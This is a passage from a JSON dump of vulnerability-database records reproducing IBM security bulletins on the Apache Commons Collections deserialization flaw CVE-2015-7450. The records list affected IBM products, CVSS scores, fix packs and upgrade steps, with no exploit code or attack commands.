"86049AD5B728A475ACFB48AEFA39FBAE662CCDAA8014795312D69A9E860527D2", "href": "https://www.ibm.com/support/pages/node/690767", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:11", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of Maximo Asset Management, Maximo Asset Management Essentials, Maximo Industry Solutions (including Maximo for Energy Optimization, Maximo for Government, Maximo for Nuclear Power, Maximo for Transportation, Maximo for Life Sciences, Maximo for Oil and Gas, and Maximo for Utilities), Maximo Adapter for Primavera, IBM Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Change and Configuration Management Database, and TRIRIGA Energy Optimization. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult [_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nMaximo Asset Management 7.6 \nSmartCloud Control Desk 7.6 \nMaximo for Life Sciences 7.6 \nMaximo for Aviation 7.6| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nMaximo Asset Management 7.5 \nMaximo Asset Management Essentials 7.5 \nMaximo for Government 7.5 \nMaximo for Nuclear Power 7.5 \nMaximo for Transportation 7.5 \nMaximo for Life Sciences 7.5 \nMaximo for Oil and Gas 7.5 \nMaximo for Utilities 7.5 \nMaximo Adapter for Primavera 7.5 \nIBM Control Desk 7.5 \nTRIRIGA Energy Optimization 1.1| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 8.5 Full Profile \nIBM 
WebSphere Application Server 8.0 \nIBM WebSphere Application Server 7.0 \nMaximo Asset Management 7.1 \nMaximo Asset Management Essentials 7.1 \nMaximo Asset Management for Energy Optimization 7.1 \nMaximo for Government 7.1 \nMaximo for Nuclear Power 7.1 \nMaximo for Transportation 7.1 \nMaximo for Life Sciences 7.1 \nMaximo for Oil and Gas 7.1 \nMaximo for Utilities 7.1 \nMaximo Adapter for Primavera 7.1| IBM WebSphere Application Server 7.0 \nTivoli Asset Management for IT 7.2 \nTivoli Service Request Manager 7.2 \nChange and Configuration Management Database 7.2| IBM WebSphere Application Server 8.5.5 Full Profile \nIBM WebSphere Application Server 7.0 \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T03:02:31", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with Asset and Service Management (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-22T03:02:31", "id": "CD6036E42997395942F7FF83895D94F94E8BFD2DC6168C160F484DA20BCCF217", "href": "https://www.ibm.com/support/pages/node/271703", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:50:25", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Standards Processing Engine.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Standards Processing Engine for Supply Chain EDI v.2.0.0.0/8.5.0.0 and v.2.0.1.1/8.5.1.1 \nIBM Standards Processing Engine for Healthcare Payer v.2.0.0.0/8.5.0.0 and v.2.0.1.1/8.5.1.1\n\n## Remediation/Fixes\n\nFix for all affected versions is to download and install the interim fix [8.5.1.1-OtherSoftware-SPE-All-if0001](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) from [IBM Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>). 
\n \n\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nIBM Standards Processing Engine for Supply Chain EDI| 2.0.0.0 / 8.5.0.0| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n2.0.1.1 / 8.5.1.1| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \nIBM Standards Processing Engine for Healthcare Payer| 2.0.0.0 / 8.5.0.0| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n2.0.1.1 / 8.5.1.1| None| [Fix Central](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FOther+software%2FStandards+Processing+Engine&fixids=8.5.1.1-OtherSoftware-SPE-All-if0001&source=SAR>) \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## Workarounds and Mitigations\n\nNo workarounds or mitigations are available. \n\n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. 
IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T12:11:44", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Standards Processing Engine (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-05-15T12:11:44", "id": "5AC842C76A38BA7E6961E8ACD0BA85FA50688DCA05B04D73F870154778C0B550", "href": "https://www.ibm.com/support/pages/node/273733", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:44", "description": "## Summary\n\nThe following vulnerability in Apache commons that affects the desktop IBM Process Designer has been addressed.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION: **Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, 
related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base score: 9.8 \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Products | Versions \n---|--- \nIBM Business Automation Workflow | 18.0.0.0 - 19.0.0.3 \nIBM Business Process Manager | 8.6.0.0 - 8.6.0.0 CF2018.03 \nIBM Business Process Manager | 8.5.0.0 - 8.5.7 2017.06 \nIBM Business Process Manager | 8.0.0.0 - 8.0.1.3 \n \n## Remediation/Fixes\n\nInstall interim fix JR61681 for your version:\n\n * [IBM Business Automation Workflow 19.0.0.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019003-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 19.0.0.2](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019002-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 19.0.0.1](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10019001-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Automation Workflow 18.0.0.1](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.10018001-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager 8.6.0.0 
CF2018.03](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=fixId&fixids=8.6.0.201803-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Advanced 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Standard 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Express 8.5.7 CF2017.06](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=fixId&fixids=8.5.7.201706-WS-BPMPCPD-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Advanced 8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Standard 8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n * [IBM Business Process Manager Express 
8.0.1.3](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=fixId&fixids=8.0.1.3-WS-BPMPC-IFJR61681&includeSupersedes=0&source=fc>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T15:02:20", "type": "ibm", "title": "Security Bulletin: CVE-2015-7450 affects the desktop IBM Process Designer used in IBM Business Automation Workflow and IBM Business Process Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-14T15:02:20", "id": "7B3AC56328D3147E79BEC5737ADB41C519A985674FD8C6C608CC27164A464E84", "href": "https://www.ibm.com/support/pages/node/1143214", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:50:54", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component of IBM InfoSphere Master Data Management Server . 
Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM InfoSphere Master Data Management Server 9.0| IBM WebSphere Application Server 7.0 \nIBM InfoSphere Master Data Management Server 10.0| IBM WebSphere Application Server 7.0 \nIBM InfoSphere Master Data Management Server 10.1| IBM WebSphere Application Server 8.0 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.0| IBM WebSphere Application Server 8.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.3| IBM WebSphere Application Server 8.5.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.4| IBM WebSphere Application Server 8.5.5 \nIBM InfoSphere Master Data Management Standard/Advanced Edition 11.5| IBM WebSphere Application Server 8.5.5 \n \n## Workarounds and Mitigations\n\nNone that are known.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:58:00", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server shipped with IBM InfoSphere Master Data Management Server (CVE-2015-7450)", "bulletinFamily": "software", 
"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-04-27T09:58:00", "id": "D71ECE9054A0423D2796261CBA40257762AA9E2D7719136781F2B173EA9107E9", "href": "https://www.ibm.com/support/pages/node/272071", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by WebSphere Application Server and WebSphere Application Server Hypervisor Edition. This vulnerability does not affect the IBM HTTP Server or versions of WebSphere Application Server prior to Version 7.0. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>)** \nDESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThe following Versions of WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition may be affected: \n\n * Version 8.5 and 8.5.5 Traditional and Liberty \n * Version 8.0 \n * Version 7.0\n * Prior Versions of WebSphere Application Server are not affected. \n\n## Remediation/Fixes\n\n**For IBM WebSphere Application Server ****Liberty ** \n**For Liberty V8.5.5.0 through 8.5.5.9 and 16.0.0.2 through 17.0.0.3 using the optional EJB Embeddable Container and JPA Client Feature: **\n\nIf you use Liberty and you have the following files on your system:\n\n\u00b7 com.ibm.ws.ejb.embeddableContainer_nls_8.5.0.jar\n\n\u00b7 com.ibm.ws.jpa.thinclient_8.5.0.jar\n\nthen you are using the vulnerable feature and you should upgrade these jars to the 17.0.0.4 version. \n\n**To upgrade the jars that were installed with archive install**: \n\n * Apply the [Liberty extras](<http://www-01.ibm.com/support/docview.wss?uid=swg24044285>) [](<www-01.ibm.com/support/docview.wss?uid=swg24044285>)jar, wlp-extras-17.0.0.4.jar from the Liberty Fix Pack 17.0.0.4 or later. \n \n\n\n**To upgrade the jars that were installed with the IBM installation manager:**\n\n * Delete the EJB Embeddable Container and JPA Client jars from the ${wlp.install.dir}/dev/tools/containers directory, and then use the wlp-extras-17.0.0.4.jar from the Liberty Fix Pack 17.0.0.4 or later to install the fixed version. More information can be found in the [_Knowledge Center_](<https://www.ibm.com/support/knowledgecenter/SSEQTP_liberty/com.ibm.websphere.wlp.nd.multiplatform.doc/ae/twlp_ins_modify.html>) . \n \n\\--OR \n\n * Apply Liberty Fix pack 17.0.0.4 or later. 
\n \n**To upgrade the jars from WASdev**: \n\n * Download the fix from here: <https://developer.ibm.com/wasdev/downloads/#asset/tools-WAS_Liberty_Java_EE_Application_Test_Utilities>\n \n**Important notes:** The version of WebSphere Liberty that you use and the version of the developer extra jar files do not need to match Fixpack levels. The Application Server does not contain the vulnerability, but it is present in the jars that are part of the developer extras. \n\n \n \n**For V8.5.0.0 through 8.5.5.7 WebSphere Liberty:** \n \nThe IBM WebSphere Application Server Liberty only enables the Apache Commons Collections if you are using ONE of the following three features: \n\n * jsf-2.0\n * jsf-2.2\n * jpa-2.0\n \nYou may be vulnerable if you are using any one of these features. To determine whether you are vulnerable, look in the console.log for this message: \n\n```\n[AUDIT ] CWWKF0012I: The server installed the following features: [xxxxx]\n```\n\nIf the feature list in place of xxxxx does not contain any one of those three features, you are not vulnerable. 
\n\n * If you are vulnerable, upgrade to the minimal fix pack level required by the interim fix and then apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\n\\-- OR \n\n * Apply Fix Pack 8 (8.5.5.8), or later.\n\n \n**For IBM WebSphere Application Server and IBM WebSphere Application Server Hypervisor Edition:** \n \n**For V8.5.0.0 through 8.5.5.7:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\\-- OR \n * Apply Fix Pack 8 (8.5.5.8), or later.\n \n**For V8.0.0.0 through 8.0.0.11:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\\-- OR \n * Apply Fix Pack 12 (8.0.0.12), or later.\n \n**For V7.0.0.0 through 7.0.0.39:**\n\n * Apply Interim Fix [PI52103](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\\-- OR \n * Apply Fix Pack 41 (7.0.0.41), or later. 
\n \n\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T00:26:26", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2022-09-08T00:26:26", "id": "EE24AB0B2E014F082958A51E75EF50D8A2A13DBA178F55CE89E4F1B70E8B8524", "href": "https://www.ibm.com/support/pages/node/271209", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:53:52", "description": "## Summary\n\nIBM TRIRIGA Platform is vulnerable to Java Object De-Serialization Vulnerability.\n\n## Vulnerability Details\n\n**CVEID: **_CVE-2015-7450_ \n \nCVSS Base Score: 9.80 \nCVSS Temporal Score: See [_X-Force_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: 
(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following IBM TRIRIGA Application Platform versions are affected. \n\u00b7 IBM TRIRIGA Application Platform 3.4. \n\u00b7 IBM TRIRIGA Application Platform 3.3.\n\n## Remediation/Fixes\n\nThis vulnerability is resolved in the IBM TRIRIGA Application Platform 3.4.2.2, and 3.3.2.5 fix packs.\n\n## Workarounds and Mitigations\n\nUntil you apply the fixes, it may be possible to reduce the risk of a successful attack by restricting access to internal networks, and not allowing external/Internet access to the application.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-08T20:39:52", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM TRIRIGA Application Platform (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2021-12-08T20:39:52", "id": "9E20D1855575208AB10D7A37A8F732F5FB0995B4D096646EBC735EE1706B18C6", "href": "https://www.ibm.com/support/pages/node/273787", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:45:47", "description": "## 
Summary\n\nIBM WebSphere Application Server is embedded in Tivoli Integrated Portal shipped as a component of Tivoli Network Manager IP Edition 3.8, 3.9, 4.1, 4.1.1 and 4.2. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletins below \n\n \n[_Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n[_Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)_](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\n_Principal Product and Version(s)_| _Affected Supporting Product and Version_ \n---|--- \nIBM Tivoli Network Manager 3.8| Bundles TIP version 1.1.1.x, which bundles IBM WebSphere version 6.1.0.x. \nIBM Tivoli Network Manager 3.9| Bundles TIP version 2.1.0.x, which bundles IBM WebSphere version 7.0.0.x. \nIBM Tivoli Network Manager 4.1 and 4.1.1| Bundles TIP version 2.2.0.x, which bundles IBM WebSphere version 7.0.0.x. \nIBM Tivoli Network Manager 4.2| IBM Tivoli Network Manager 4.2 requires IBM WebSphere Application Server Version 8.5.5.5 or later to be installed separately. Users are recommended to apply the IBM WebSphere version 8.5.5.5 Security Interim Fixes. 
\n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:20:04", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server embedded in Tivoli Integrated Portal shipped with Tivoli Network Manager IP Edition (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:20:04", "id": "9E3FCEB3C8DC76AD3152DBCC2EFEFAB5F229FFCEF4CF1D756D45190726CF3D0D", "href": "https://www.ibm.com/support/pages/node/545607", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:02", "description": "## Summary\n\nWebsphere Application Server is shipped as a component of Jazz for Service Management. 
Information about the security vulnerabilities affecting Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the below security bulletins \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n[Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nJazz for Service Management version 1.1, 1.1.1, 1.1.2| Websphere Application Server 8.5.5 Full Profile \n \n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 